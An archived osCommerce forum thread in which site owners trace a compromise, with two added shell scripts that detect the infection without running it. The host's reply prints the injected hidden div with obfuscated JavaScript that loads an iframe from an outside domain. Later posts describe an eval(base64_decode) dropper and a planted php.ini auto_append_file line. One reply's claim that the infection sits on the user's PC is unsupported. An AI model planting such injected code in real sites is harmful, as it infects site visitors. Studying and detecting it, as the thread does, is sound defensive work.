
My ecommerce site has been hacked


luxurycandles


Hi,

I am running my site from the OSC v2.2 release. When I loaded the site, Windows alerted me of a trojan called Artemis!4D940ABB21EC.

Having done some initial spot checks, it's not apparent from the code or the database; all appears OK.

I then contacted my host providers and got the following reply:

------------------------------------------------------------------------------------------------------------------------------------

Hi,

Seems some code has been added:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7474" height="1" width="1"><img src="about:blank" onError='astro=unescape("%27");astru=unescape("%22");sksa=eval("document.getElementById("+astro+"seaid"+astro+").src=unescape("+astro+"%68%74%74%70%3A%2F%2F"+astro+")+document.getElementById("+astro+"7474"+astro+").id+unescape("+astro+"%2E%69%6E%2F"+astro+")+"+astro+"1289234763"+astro+"+unescape("+astro+"%2E%70%68%70"+astro+")");document.getElementById("seaid").src=sksa' style="width:300;height:300;border:0px;"><iframe id="seaid" src="about:blank"></iframe></div>

It tried to take me to http://7474.in/1289234763.php

So you will need to check and remove that code from your template.

--------------------------------------------------------------------------------------------------------------------------------------

I then looked in the code and database again for anything that looks like it may inject the div code, but it's not so clear. I am currently running a Beyond Compare between the current live site and the latest copy of the site I have taken.

I would be most grateful if anyone can assist on this matter. I have also been having a look through the forums for any guidance.

Thanks in advance!


Read the security forum on how to secure your site and the admin area. Look for anomalous files and malicious code. The most common hacked files are index.php, application_top.php, header.php and configure.php.

While you are trying to clean your site, I suggest password protecting the entire site so potential customers don't accidentally receive the virus your site is spreading.

Chris


Hi Chris,

Thank you for getting in touch and your advice... Here's what I found!

Having gone through the code and compared with the original source code, I found the following line had been added at the end of the header.asp:

<?php eval(base64_decode("-----CODE----------------?>

It uses a PHP function, base64_decode, to decode the huge chain of characters. Having googled for an online 64 bit decoder, I was able to decode the above, which produces the following...

function s37($s)-----------CODE ------(hctam_gerp((fi'))

When I was in touch with my web host provider earlier, they initially pointed out there was code (below) being generated and potentially injected into the site, and the following was most likely generated by the above function...

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7474"------ CODE ------</iframe></div>

It tried to take me to http://7474.in/1289234763.php

Thanks for pointing me in the right direction!

Kind Regards,

Tajinder

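Added example (not part of Tajinder's post, nor osCommerce code): a small POSIX shell script that does what this post describes by hand, namely find PHP files carrying an obfuscated eval(base64_decode("...")) call, decode the base64 literal with base64(1) so it can be read, and flag reversed function names like the "hctam_gerp" (preg_match backwards) seen in the decoded output above. The payload is only decoded, never handed to php. The sample catalog tree, the header.php contents and the harmless payload are constructed here for the demonstration; point find_eval_b64 at a real catalog directory to use it.

```shell
#!/bin/sh
# Added example, not code from the original thread. Finds obfuscated
# eval(base64_decode("...")) calls and decodes the payload for review.
# Nothing decoded here is ever executed.

# Constructed sample tree standing in for an osCommerce catalog directory.
make_sample_tree() {
    sample_dir=$(mktemp -d)
    # Harmless stand-in payload. "hctam_gerp" is preg_match spelled backwards,
    # the reversed-name trick visible in the thread's decoded output.
    sample_payload='function s37($s){ return strrev($s); } $f = s37("hctam_gerp"); /* constructed sample */'
    sample_b64=$(printf '%s' "$sample_payload" | base64 | tr -d '\n')
    printf '<?php\n$title = "header";\neval(base64_decode("%s"));\n' "$sample_b64" > "$sample_dir/header.php"
    printf '<?php\n$title = "index";\n' > "$sample_dir/index.php"
    printf '%s\n' "$sample_dir"
}

# List PHP files under directory $1 that contain the eval(base64_decode( pattern.
find_eval_b64() {
    find "$1" -type f -name '*.php' -exec grep -l 'eval(base64_decode(' {} + 2>/dev/null | sort
}

# Number of such files; a cron job can alert on any non-zero count.
count_eval_b64() {
    find_eval_b64 "$1" | wc -l | tr -d ' '
}

# Extract each base64 literal from eval(base64_decode("...")) in file $1 and
# print it decoded, one payload per line.
decode_payloads() {
    sed -n 's|.*eval(base64_decode("\([A-Za-z0-9+/=]*\)").*|\1|p' "$1" |
    while IFS= read -r b64; do
        printf '%s' "$b64" | base64 -d 2>/dev/null || true
        printf '\n'
    done
}

# Flag reversed PHP function names in decoded text read from stdin. The names
# are stored pre-reversed so the script needs no rev(1):
#   hctam_gerp = preg_match, edoced_46esab = base64_decode, lave = eval
find_reversed_names() {
    grep -E -o 'hctam_gerp|edoced_46esab|lave' | sort -u
}

# Walk the constructed sample: list hits, show each decoded payload, then the
# reversed names it contains.
SAMPLE_DIR=$(make_sample_tree)
find_eval_b64 "$SAMPLE_DIR" | while IFS= read -r hit; do
    printf '== %s\n' "$hit"
    decode_payloads "$hit"
    printf 'reversed names: %s\n' "$(decode_payloads "$hit" | find_reversed_names | tr '\n' ' ')"
done
```

Decoding a payload this way shows what the injected code does before anything is restored; the decoded text belongs in the incident notes, and the file itself should be replaced from a clean copy rather than edited in place, since the same dropper usually leaves more than one file behind.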

1 month later...

Hi all, I have a similar but more complicated case.

All my pages, both catalog and admin, are injected with the code in the first post of this thread. Problem is I cannot find it anywhere in the code. Tried grep with "eval(base64_decode" on the code and the database but nothing is found. I also checked .htaccess files and they are just fine.

But here's the strange behaviour.

I have a RedHat Enterprise server with Plesk with different domains. Two of my domains have osCommerce installed. Only one of them is infected.

- When I make a new installation of osCommerce 2.3.1 (with a new clean database) on the infected domain, the new installation is infected.

- When I make a new installation of osCommerce 2.3.1 (with a new clean database) on a second (another) virtual domain, the new installation is infected !?!!

- When I make a new installation of osCommerce 2.3.1 on a third domain where I already have osCommerce 2.2 installed, the new installation is clean (not infected). I of course installed in another directory.

As I have also noticed that the injected code appears at random and not always, I would say that probably the server is infected and not just the installation of osCommerce.

I'd appreciate any clues you could provide.


The Generic!Artemis virus is a relatively new virus which spread, I think, in 2008 or so, and has been assessed to be a low threat virus.

If you have this virus, it's most likely on your PC and not on the server side of your osCommerce, so download Malwarebytes and run it on your system; this should find the virus and delete it.


Finally, I found the damn script !!!

I've been fighting with the same malware code for almost 10 days now. The code is hidden in the /tmp directory, and it manages to execute depending on URL conditions. That's why it's been so hard to find or reproduce.

It's not specifically a problem of osCommerce, nor of WordPress or Joomla.

The installations get infected inside the images directory, which most users leave wide open (drwxrwxrwx). This malware affects a complete hosting server (all hosting users / pages are affected), since the php.ini file is modified by the hackers:

auto_append_file=/tmp/ssl.php

error_reporting=0

They auto-append the malware script to all PHP scripts, but it executes depending on the URL form. And they also deactivate error reporting, so you cannot see any problems in the log files.

Don't forget to clean all malware code from your images directory. There is sometimes a ";.php" file in the dir, and also a lot of google*.php files or goog1*.php files.

I hope this helps. Be free !

God bless you all !

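Added example (not from this post, nor osCommerce or Plesk code): a POSIX shell script that turns the three findings above into repeatable host-level checks: hostile auto_append_file / auto_prepend_file and error_reporting=0 lines in php.ini, world-writable directories such as the drwxrwxrwx images folder, and PHP files sitting inside any images directory (";.php", google*.php and the like). It builds a constructed sample host tree under mktemp so it runs offline; the php.ini contents, directory names and file names are constructed for the demonstration, and for real use the functions would be pointed at the server's own php.ini and web root.

```shell
#!/bin/sh
# Added example, not code from the original thread. Host-level checks for the
# infection pattern described in the post: php.ini auto-append, a wide-open
# images directory, and PHP files dropped into it.

# Constructed sample host tree. Returns its root path.
make_sample_host() {
    root=$(mktemp -d)
    mkdir -p "$root/etc" "$root/catalog/images" "$root/catalog/includes"
    # Pin normal permissions so the check below only flags what we open up.
    chmod 755 "$root" "$root/etc" "$root/catalog" "$root/catalog/includes"
    # Constructed php.ini: the two directives the post reports, among normal lines.
    printf 'memory_limit=128M\nauto_append_file=/tmp/ssl.php\nerror_reporting=0\ndisplay_errors=Off\n' > "$root/etc/php.ini"
    # Constructed images directory, wide open, with the file names the post mentions.
    : > "$root/catalog/images/logo.gif"
    : > "$root/catalog/images/;.php"
    : > "$root/catalog/images/google1a2b.php"
    : > "$root/catalog/includes/application_top.php"
    chmod 777 "$root/catalog/images"
    printf '%s\n' "$root"
}

# Check 1: lines in php.ini $1 that make a dropped file run on every request
# (auto_append_file, and its twin auto_prepend_file) or silence its errors.
check_php_ini() {
    grep -E '^[[:space:]]*(auto_append_file|auto_prepend_file)[[:space:]]*=|^[[:space:]]*error_reporting[[:space:]]*=[[:space:]]*0[[:space:]]*$' "$1" || true
}

# Check 2: world-writable directories under $1 (the drwxrwxrwx images dir).
find_world_writable_dirs() {
    find "$1" -type d -perm -002 2>/dev/null | sort
}

# Check 3: PHP files inside any images directory under $1. A media directory
# has no business holding scripts, whatever they are named.
find_php_in_images() {
    find "$1" -type f -path '*/images/*' -name '*.php' 2>/dev/null | sort
}

# Count non-empty output lines of a check, e.g. count_hits find_php_in_images /var/www
count_hits() {
    "$@" | awk 'NF { n++ } END { print n + 0 }'
}

# Run all three checks over the constructed host.
SAMPLE_ROOT=$(make_sample_host)
printf 'php.ini directives to review:\n';  check_php_ini "$SAMPLE_ROOT/etc/php.ini"
printf 'world-writable directories:\n';    find_world_writable_dirs "$SAMPLE_ROOT"
printf 'PHP files under images/:\n';       find_php_in_images "$SAMPLE_ROOT"
```

On a real server the same three functions run against /etc/php.ini (or whatever `php --ini` reports) and the web root; a clean host returns nothing from all of them. Because the auto-appended file lives in /tmp rather than in any site, cleaning only the osCommerce directory leaves the next request re-infecting every page, which is exactly the behaviour the earlier post on fresh installations describes.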

Archived

This topic is now archived and is closed to further replies.
